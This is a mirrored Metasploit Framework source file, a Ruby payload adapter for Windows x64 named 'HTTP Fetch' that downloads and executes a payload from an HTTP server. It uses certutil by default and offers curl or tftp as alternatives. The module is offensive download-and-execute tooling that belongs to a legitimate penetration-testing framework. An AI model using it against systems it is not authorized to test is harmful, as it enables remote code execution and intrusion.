CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/adapters/cmd/windows/http/x64.rb
Views: 11783
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
include Msf::Payload::Adapter::Fetch::HTTP
8
include Msf::Payload::Adapter::Fetch::WindowsOptions
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'HTTP Fetch',
15
'Description' => 'Fetch and execute an x64 payload from an HTTP server.',
16
'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
17
'Author' => 'Brendan Watters',
18
'Platform' => 'win',
19
'Arch' => ARCH_CMD,
20
'License' => MSF_LICENSE,
21
'AdaptedArch' => ARCH_X64,
22
'AdaptedPlatform' => 'win'
23
)
24
)
25
deregister_options('FETCH_COMMAND')
26
register_options(
27
[
28
Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
29
]
30
)
31
end
32
end
33
34